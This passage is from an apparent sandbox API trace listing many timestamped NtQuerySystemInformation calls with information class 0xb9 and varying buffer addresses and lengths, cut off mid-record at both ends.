NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0210.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0210.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd440, Length=0x20, ResultLength=0x0) [0210.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3c0, Length=0x20, ResultLength=0x0) [0210.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3c0, Length=0x20, ResultLength=0x0) [0210.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3c0, Length=0x20, ResultLength=0x0) [0210.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x58, ResultLength=0x0) [0210.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x28, ResultLength=0x0) [0210.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0210.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0210.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0210.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0210.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x58, ResultLength=0x0) [0210.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0210.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0210.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0210.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0210.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x28, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0210.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0210.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0210.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0210.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0210.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd360, Length=0x20, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd360, Length=0x20, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd360, Length=0x20, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c8, Length=0x50, ResultLength=0x0) [0210.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0210.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x28, ResultLength=0x0) [0210.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0210.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x28, ResultLength=0x0) [0210.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x28, ResultLength=0x0) [0210.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0210.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x20, ResultLength=0x0) [0210.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x20, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0210.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd870, Length=0x50, ResultLength=0x0) [0210.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x38, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, 